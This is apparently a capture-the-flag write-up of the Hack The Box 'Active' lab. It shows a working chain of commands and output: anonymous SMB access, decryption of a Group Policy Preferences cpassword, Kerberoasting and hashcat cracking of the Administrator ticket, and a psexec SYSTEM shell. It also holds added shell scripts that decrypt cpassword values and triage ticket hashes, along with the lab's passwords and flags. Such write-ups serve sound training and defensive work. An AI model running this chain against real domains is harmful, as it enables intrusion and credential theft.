Nmap Scan
To begin, let's run an Nmap scan to identify the open ports and services on the target machine.
└─$ nmap -sC -sV -Pn -v 10.129.1.129
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-22 01:44:51Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1027/tcp  filtered IIS
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3283/tcp  filtered netassistant
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
49165/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time: 
|   date: 2024-10-22T01:45:47
|_  start_date: 2024-10-22T01:34:02
NSE: Script Post-scanning.
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.02 seconds
           Raw packets sent: 1521 (66.924KB) | Rcvd: 1052 (46.485KB)
Key results from the scan:
- The server appears to be running Windows Server 2008 R2 SP1.
- Several important ports are open, including DNS (53), Kerberos (88), LDAP (389), SMB (445), and RPC services.
Adding Host Entry
Next, add the target's domain to our /etc/hosts file to make subsequent interactions easier:
echo "10.129.1.129    active.htb" | sudo tee -a /etc/hosts
Enumerating SMB Shares
How many SMB shares are shared by the target? 7
To determine how many SMB shares are exposed, list them anonymously with smbclient:
└─$ smbclient -L  \\\\10.129.1.129\\    
Password for [WORKGROUP\kali]:
Anonymous login successful
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Results:
- A total of 7 shares are available, including Replication and Users.
- The Replication share allows anonymous read access.
You can also run nxc smb to enumerate shares:
└─$ nxc smb active.htb -u '' -p '' --shares                             
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\: 
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON                        Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL                          Logon server share 
SMB         10.129.1.129    445    DC               Users                           
What is the name of the share that allows anonymous read access? Replication
Accessing the Replication Share
Which file has encrypted account credentials in it? Hint: It's an XML file. Groups.xml.
Method 1:
To dig deeper into ‘Replication’, I unleashed Netexec’s spider module. This handy tool crawls through the share, much like a spider exploring every nook and cranny of its web. It downloads files as it goes, which means I could sit back and let it gather all the goodies.
└─$ nxc smb active.htb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\: 
SPIDER_PLUS 10.129.1.129    445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.1.129    445    DC               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.1.129    445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.1.129    445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.1.129    445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.1.129    445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON                        Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL                          Logon server share 
SMB         10.129.1.129    445    DC               Users                           
SPIDER_PLUS 10.129.1.129    445    DC               [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.1.129.json".
SPIDER_PLUS 10.129.1.129    445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.1.129    445    DC               [*] SMB Readable Shares:  1 (Replication)
SPIDER_PLUS 10.129.1.129    445    DC               [*] Total folders found:  22
SPIDER_PLUS 10.129.1.129    445    DC               [*] Total files found:    7
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size average:    1.16 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size max:        3.63 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*] File unique exts:     4 (.xml, .inf, .pol, .ini)
SPIDER_PLUS 10.129.1.129    445    DC               [*] Downloads successful: 7
SPIDER_PLUS 10.129.1.129    445    DC               [+] All files processed successfully.
Method 2: Alternatively, you can access the share using smbclient, enable recursive listing and search for .xml files:
Get Groups.xml file
└─$ smbclient \\\\10.129.1.129\\Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018
smb: \> recurse ON
smb: \> ls
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> mget Groups.xml
Get file Groups.xml? yes
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
Decrypting the Password
Opening Groups.xml reveals an encrypted cpassword value for the user active.htb\SVC_TGS:
└─$ cat Groups.xml                
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
The Groups.xml file is a Group Policy Preferences (GPP) file. The cpassword value it holds is encrypted with AES-256, but the key is fixed and was published by Microsoft, so anyone who can read the file can decrypt it. We use the gpp-decrypt tool to retrieve the password:
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
What is the decrypted password for the SVC_TGS account? GPPstillStandingStrong2k18
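As an added example, not code from the write-up or from the gpp-decrypt tool, the POSIX shell functions below do what gpp-decrypt does and what a defender's SYSVOL audit does: gpp_decrypt restores the base64 padding, decrypts with AES-256-CBC under the key Microsoft published for Group Policy Preferences and strips the UTF-16LE encoding; audit_gpp walks a directory tree (the same hunt Method 1 and Method 2 above perform over the Replication share) for preference XML files that still carry a cpassword. make_sample_sysvol builds a constructed tree around the Groups.xml seen above so the whole thing runs offline; it assumes openssl, base64, find, grep and sed are available.

```shell
#!/bin/sh
# Added example, not from the write-up: reimplements what gpp-decrypt does and
# adds the audit a defender runs over SYSVOL. Needs openssl, base64, find, grep, sed.

# AES-256 key Microsoft published for Group Policy Preferences (MS14-025).
# Because the key is public, cpassword is effectively stored in clear text.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

# gpp_decrypt CPASSWORD -> prints the plaintext password (no trailing newline)
gpp_decrypt() {
    cp=$1
    # cpassword values are stored without base64 padding; restore it
    while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="${cp}="; done
    # AES-256-CBC with an all-zero IV and PKCS#7 padding; the plaintext is UTF-16LE.
    # Dropping the NUL bytes is enough for ASCII passwords (use iconv for others).
    printf '%s' "$cp" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv 00000000000000000000000000000000 \
        | tr -d '\000'
}

# audit_gpp DIR -> prints "FILE:PASSWORD" for every preference XML under DIR
# that still carries a cpassword attribute (MS14-025 stopped new policies from
# storing one but left existing files untouched, which is what this finds)
audit_gpp() {
    find "$1" -type f -name '*.xml' | while read -r f; do
        grep -o 'cpassword="[^"]*"' "$f" | sed 's/^cpassword="//; s/"$//' \
        | while read -r c; do
            if [ -n "$c" ]; then printf '%s:%s\n' "$f" "$(gpp_decrypt "$c")"; fi
        done
    done
}

# make_sample_sysvol -> builds a constructed SYSVOL-like tree in a temp dir and
# prints its path; Groups.xml reuses the cpassword from the Replication share
make_sample_sysvol() {
    root=$(mktemp -d)
    pref="$root/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences"
    mkdir -p "$pref/Groups" "$pref/Registry"
    cat > "$pref/Groups/Groups.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User name="active.htb\SVC_TGS"><Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/></User></Groups>
EOF
    # a preference file with no stored credential must produce no finding
    printf '<Registry><Properties action="U" key="HKLM\\Software\\Example"/></Registry>\n' \
        > "$pref/Registry/Registry.xml"
    printf '%s' "$root"
}

# Usage: decrypt the value from the write-up's Groups.xml, then audit the sample tree
gpp_decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'; echo
audit_gpp "$(make_sample_sysvol)"
```

Point audit_gpp at a mounted SYSVOL copy to confirm no policy in your own domain still ships a cpassword; any hit means the account password must be rotated, not just the file removed.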
Validating Credentials
With the username SVC_TGS and the decrypted password, validate access using nxc smb:
└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18               
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
The credentials are valid, and we can now access additional shares, including the Users share.
└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18 --shares
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.1.129    445    DC               Users           READ            
Retrieving User Flag
Using smbclient, we connect to the Users share to retrieve the user.txt file.
Navigate to the SVC_TGS\Desktop directory, find the user.txt and download it.
└─$ smbclient \\\\10.129.1.129\\Users --user=active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018
                10459647 blocks of size 4096. 5204078 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018
                10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Mon Oct 21 21:34:59 2024
                10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\Desktop\> cat user.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
Get file user.txt? yes
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
The User Flag is
└─$ cat user.txt      
43d6c8971545f31bf3e0dc8fea6afcfd
Kerberoasting
To escalate privileges, we attempt a Kerberoasting attack. Before proceeding further, we need to ensure our system clock is in sync with the Domain Controller, as time synchronisation is crucial for handling Kerberos tickets. We use ntpdate to synchronise our clock with the DC:
└─$ sudo ntpdate active.htb   
2024-10-21 22:47:07.748134 (-0400) -0.512112 +/- 0.077772 active.htb 10.129.1.129 s1 no-leap
CLOCK: time stepped by -0.512112
We then use Impacket's GetUserSPNs.py to locate Kerberoastable users:
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.129.1.129 active.htb/SVC_TGS
[sudo] password for kali: 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-10-21 21:35:03.826139             
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7bfdbdc27439d277426bc8ae765034354f2075d062657995370408e9eb10ad117a934f040434bc111fcef520e888f5ece36a2ce4d94b0f5b575fff1664f77b13eaf03fc17dc4188b6f7a0455d29aaa2c2163a3b7d1eb27ed78d2f2fa306cfc42894679a3984f663ace6cb6760a98dac6e4401a20cd9b8c2ca476807f3b6c5b29dec1880908444513ec8e6df77f91e29e9ce4dd407eaf106ca89f730d0881420c9ac9df47791bf5c179c5d70645132624ba76c15b0fccf9c19d1b1ef6600e86d8b9c098ce7def46f9f55a2c945cb2ceb4eed84b5417040f62f8828c18e894f63feb7182391c7bc3d585b2063b1c06591d413ffa0e58a68742e5382cd50a6f18eeefdf122dd34888acd029380947278afa274ed09c8fac3c8ce9a042703d07008e387848af1afc2b9125d261e1553a4e8503eddba2cb0d81b47d8aa44fd408d89a40d186953cc9d03e73e29b936a8ed403a22496c86c62fc142a786fd613f272476132d5e0a54099f91021b2835a6433d4113f5fd0567062e8e9f863f0322b58bf0cef8d4dc6f6dfcab472b401fe44158d48fcdc2509995efc92a8e270204cb1b86669dfcfdb9cb39206fed27c135d0c4426e55fd17380c2e4065fb7a1a79b4ad6b126d16399cb51bc438756242247eded65439c315fcfe189b0b6e728b4f7af159548d89906d7093329371ba550ff69146dcff3f047dd8697191707d59efa2dfb89da3079c482024d1a3b67d8bc052d7c20752ef180d2dd2a473380c6e02fb0265b75ca9a87a62b92be9d73fafcd367077f661b2afd8fde73ac97d103ac8b9ea979cbe39c4787b8f92b73c7630bc6f2eb196e4a31dcb1c43fda5933e181cc99b4a316efe58ca562b9e2bda9ce04cc510adc0d0d3b8ba90c5d885b8ec249e5f977d1bf68aba0df7e4284a65eabaab386e8b6949ba906de39e9e29c997a364566b5d116a4eca290fd34e75b3405de0ff637998214d10a361c3bae032cee496e6937cb364ab007cc90aa5b003cc7eac18f4a3f7d32b082c3a060d73c72deb52b0bb1df649862a1f218be6758fd19cacb92d5fc3b7c44a400f9bfcb5167701e3b425078b0902fbe9c7703ffb4c29953ee939772685dc1743147346f2def8f8ab870f5ec2cb0b3c88c0c63b02f01745281a4b3894d0f704e7a2d8ad78b2bb7c691de9669b19a7fc92103827c27c4d8c8c04b7567cb044b174f4ed01f712bd059909008d960859740c4163f59bfd994067fffcf0badc0
Which service account on Active is vulnerable to Kerberoasting? Administrator
A TGS-REP hash for the Administrator account is found. Save this hash to a file and use Hashcat to crack it.
To find the matching hashcat hash-mode number, run:
hashcat --help | grep -i "Kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocol
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$[...]:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
The cracked password is: Ticketmaster1968
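As an added example, not from the write-up, Impacket or hashcat, the shell functions below triage a $krb5tgs$ line of the kind GetUserSPNs.py printed above: they read the encryption type to pick the hash mode from the table just shown, and pull out the account and realm so a defender knows which service account's password is exposed and must be rotated. SAMPLE_HASH is the header of the Administrator ticket above with its ciphertext shortened to a few constructed bytes.

```shell
#!/bin/sh
# Added example, not from the write-up: triage a $krb5tgs$ line as printed by
# GetUserSPNs.py. Fields are '$'-separated:
#   $krb5tgs$<etype>$*<account>$<REALM>$<spn>*$<checksum>$<ciphertext>   (etype 23)
#   $krb5tgs$<etype>$<account>$<REALM>$*<spn>*$<checksum>$<ciphertext>   (etype 17/18)

# Constructed sample: the header of the Administrator ticket from the page with
# the ciphertext cut down to a few bytes (enough for the header checks below).
SAMPLE_HASH='$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7b'

# krb5tgs_field HASH N -> the N-th '$'-separated field (1-based; field 1 is empty)
krb5tgs_field() { printf '%s' "$1" | awk -F '[$]' -v n="$2" '{ print $n }'; }

# krb5tgs_mode HASH -> hashcat mode for the ticket's encryption type, taken from
# the table above; fails for anything that is not a krb5tgs line
krb5tgs_mode() {
    [ "$(krb5tgs_field "$1" 2)" = krb5tgs ] || return 1
    case "$(krb5tgs_field "$1" 3)" in
        23) echo 13100 ;;   # RC4-HMAC: keyed directly by the NT hash, cheapest to crack
        17) echo 19600 ;;   # AES128-CTS-HMAC-SHA1-96
        18) echo 19700 ;;   # AES256-CTS-HMAC-SHA1-96
        *)  return 1 ;;
    esac
}

# krb5tgs_account HASH -> ACCOUNT@REALM of the account whose key protects the
# ticket; a privileged name here (Administrator carrying an SPN) is the finding
krb5tgs_account() {
    printf '%s@%s' "$(krb5tgs_field "$1" 4 | sed 's/^\*//')" "$(krb5tgs_field "$1" 5)"
}

# Usage
echo "mode=$(krb5tgs_mode "$SAMPLE_HASH") account=$(krb5tgs_account "$SAMPLE_HASH")"
```

An etype of 23 also tells the defender that RC4 is still negotiable for that account; restricting it to AES and giving SPN-bearing accounts long random passwords removes what made the crack above feasible.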
Gaining Administrative Access
With the Administrator credentials, we use Impacket's psexec to gain a shell as nt authority\system:
└─$ impacket-psexec administrator@10.129.1.129
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
Password:
[*] Requesting shares on 10.129.1.129.....
[*] Found writable share ADMIN$
[*] Uploading file SZHVJVMK.exe
[*] Opening SVCManager on 10.129.1.129.....
[*] Creating service QaoB on 10.129.1.129.....
[*] Starting service QaoB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
Once connected, we retrieve the root.txt flag from the Administrator's desktop:
C:\Users\Administrator\Desktop> type root.txt
8e97770dadbd61a37a8e041332d5e98d
C:\Users\Administrator\Desktop> ipconfig /all
 
Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : active.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : active.htb
                                       .htb
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-A1-0A
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.129.1.129(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
   Lease Obtained. . . . . . . . . . : ��嫞, 22 ������妬 2024 4:33:55 ��
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
   Lease Expires . . . . . . . . . . : ��嫞, 22 ������妬 2024 6:33:56 ��
   Default Gateway . . . . . . . . . : 10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap..htb:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
C:\Users\Administrator\Desktop> whoami
nt authority\system